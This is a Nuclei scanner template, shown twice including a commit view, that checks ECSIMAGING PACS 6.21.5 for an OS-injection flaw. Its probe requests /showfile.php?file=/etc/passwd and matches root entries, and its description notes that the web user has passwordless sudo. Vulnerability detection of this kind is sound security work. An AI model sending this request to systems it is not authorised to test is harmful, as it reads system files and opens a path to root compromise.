nuclei-templates/vulnerabilities/other/ecsimagingpacs-rce.yaml

id: ecsimagingpacs-rce

info:
  name: ECSIMAGING PACS 6.21.5 - Remote code execution
  author: ritikchaddha
  severity: critical
  description: ECSIMAGING PACS Application in 6.21.5 and bellow suffers from a OS Injection vulnerability. The parameter `file` on the webpage /showfile.php can be exploited with simple OS injection to gain root access. www-data user has sudo NOPASSWD access
  reference: https://www.exploit-db.com/exploits/49388
  tags: ecsimagingpacs,rce

requests:
  - method: GET
    path:
      - "{{BaseURL}}/showfile.php?file=/etc/passwd"

    matchers-condition: and
    matchers:

      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
Create ecsimagingpacs-rce.yaml 2022-05-12 08:20:38 +00:00			`id: ecsimagingpacs-rce`

			`info:`
			`name: ECSIMAGING PACS 6.21.5 - Remote code execution`
			`author: ritikchaddha`
			`severity: critical`
			description: ECSIMAGING PACS Application in 6.21.5 and bellow suffers from a OS Injection vulnerability. The parameter `file` on the webpage /showfile.php can be exploited with simple OS injection to gain root access. www-data user has sudo NOPASSWD access
			`reference: https://www.exploit-db.com/exploits/49388`
			`tags: ecsimagingpacs,rce`

			`requests:`
			`- method: GET`
			`path:`
			`- "{{BaseURL}}/showfile.php?file=/etc/passwd"`

			`matchers-condition: and`
			`matchers:`

			`- type: regex`
			`regex:`
			`- "root:.*:0:0:"`

			`- type: status`
			`status:`
			`- 200`